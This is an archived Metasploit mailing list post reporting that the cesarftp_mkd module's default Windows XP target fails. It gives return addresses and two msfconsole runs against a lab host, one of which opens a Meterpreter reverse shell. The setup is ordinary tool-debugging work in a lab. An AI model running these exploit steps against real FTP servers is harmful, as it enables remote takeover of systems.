Metasploit mailing list archives
cesarftp_mkd default target XP SP2/SP3 doesn't work
From: One Time <onetime99 () ymail com>
Date: Mon, 22 Feb 2010 13:13:28 -0800 (PST)
In the cesarftp_mkd module default targets are: [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ], [ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ], [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll #[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll #[ 'Windows XP SP3 English', { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll [ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ], The exploit works only If I enable the commented out target: "#[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll" --- The following is the result of a test run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and target [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll: msf > use exploit/windows/ftp/cesarftp_mkd msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp PAYLOAD => windows/meterpreter/reverse_ord_tcp msf exploit(cesarftp_mkd) > set TARGET 2 TARGET => 2 msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131 LHOST => 192.168.159.131 msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134 RHOST => 192.168.159.134 msf exploit(cesarftp_mkd) > exploit [*] Started reverse handler on 192.168.159.131:4444 [*] Connecting to FTP server 192.168.159.134:21... [*] Connected to target FTP server. [*] Authenticating as anonymous with password mozilla () example com... [*] Sending password... [*] Trying target Windows XP SP2/SP3 English... [*] Exploit completed, but no session was created. msf exploit(cesarftp_mkd) > -- The following is the result of a test run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and target [ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll: msf > use exploit/windows/ftp/cesarftp_mkd msf exploit(cesarftp_mkd) > set PAYLOAD windows/meterpreter/reverse_ord_tcp PAYLOAD => windows/meterpreter/reverse_ord_tcp msf exploit(cesarftp_mkd) > set TARGET 3 TARGET => 3 msf exploit(cesarftp_mkd) > set LHOST 192.168.159.131 LHOST => 192.168.159.131 msf exploit(cesarftp_mkd) > set RHOST 192.168.159.134 RHOST => 192.168.159.134 msf exploit(cesarftp_mkd) > exploit [*] Started reverse handler on 192.168.159.131:4444 [*] Connecting to FTP server 192.168.159.134:21... [*] Connected to target FTP server. [*] Authenticating as anonymous with password mozilla () example com... [*] Sending password... [*] Trying target Windows XP SP2 English... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (747008 bytes) [*] Meterpreter session 1 opened (192.168.159.131:4444 -> 192.168.159.134:1026) meterpreter > -- Regards.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- cesarftp_mkd default target XP SP2/SP3 doesn't work One Time (Feb 22)